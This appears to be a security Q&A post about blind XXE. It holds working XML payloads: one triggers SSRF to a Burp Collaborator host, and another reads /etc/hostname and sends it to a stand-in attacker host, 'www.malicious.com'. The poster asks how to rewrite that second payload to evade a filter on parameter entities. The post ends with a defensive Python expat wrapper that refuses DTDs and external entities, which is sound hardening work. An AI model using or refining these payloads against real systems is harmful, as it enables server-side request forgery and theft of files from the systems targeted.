SCENARIO:
I successfully sent a request to the Burp Collaborator, so the application is vulnerable to SSRF through blind XXE. The payload I used is the following:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "http://{burp_url}.burpcollaborator.net"> ]>
<xxx>&xxe;</xxx>
If I use XML entities (% xxe) like this:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE % xxe [ <!ENTITY xxe SYSTEM "http://{burp_url}.burpcollaborator.net"> ]>
<xxx>%xxe;</xxx>
the payload doesn't work. So I suppose XML parameter entities or the % sign are filtered.
GOAL:
As the next step I want to exfiltrate /etc/hostname from the web application. The payload I found is the following:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/hostname" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]>
<foo>&callhome;</foo>
...which uses XML parameter entities (%). How can I modify the payload to avoid the use of %? Is removing the % enough to have a syntactically correct payload?
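From the defending side, the fix for both payload shapes above is the same: the parser must not accept a DTD from untrusted input, and must never resolve an external entity. As an added example that is not part of the question, here is a hardened parser wrapper built on the standard library's xml.parsers.expat; the names UnsafeXML, parse_untrusted and verdict are mine, and the sample document is a constructed copy of the first payload with a placeholder host in place of the Collaborator URL.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when an untrusted document tries something the parser refuses."""


def parse_untrusted(xml_bytes, allow_dtd=False):
    """Return the text content of an untrusted XML document.

    Layer 1: refuse any DOCTYPE, so no general (&xxe;) or parameter (%xxe;)
    entity can be declared at all.  Layer 2: even when a DTD is allowed, refuse
    to resolve external entities, the step that turns a reference into a fetch.
    """
    parser = expat.ParserCreate()
    text = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # An exception raised inside an expat handler propagates out of Parse().
        raise UnsafeXML(f"DOCTYPE refused (root {name!r}, external subset {sysid!r})")

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity refused: {sysid!r}")

    if not allow_dtd:
        parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_ref
    parser.CharacterDataHandler = text.append
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError as exc:
        raise UnsafeXML(f"malformed XML: {exc}") from None
    return "".join(text)


def verdict(xml_bytes, allow_dtd=False):
    """Log-friendly wrapper: ('ok', text) or ('refused', reason)."""
    try:
        return ("ok", parse_untrusted(xml_bytes, allow_dtd))
    except UnsafeXML as exc:
        return ("refused", str(exc))


# Constructed copy of the question's first payload; the host is a placeholder.
SSRF_PAYLOAD = (
    b'<?xml version="1.0" encoding="utf-8"?>\n'
    b'<!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "http://collaborator-placeholder.invalid/"> ]>\n'
    b'<xxx>&xxe;</xxx>'
)
BENIGN = b'<?xml version="1.0"?><xxx>hello</xxx>'
```

With the default settings the payload is refused as soon as the DOCTYPE appears; with allow_dtd=True it is still refused at the external entity reference, and in neither case does any request leave the host.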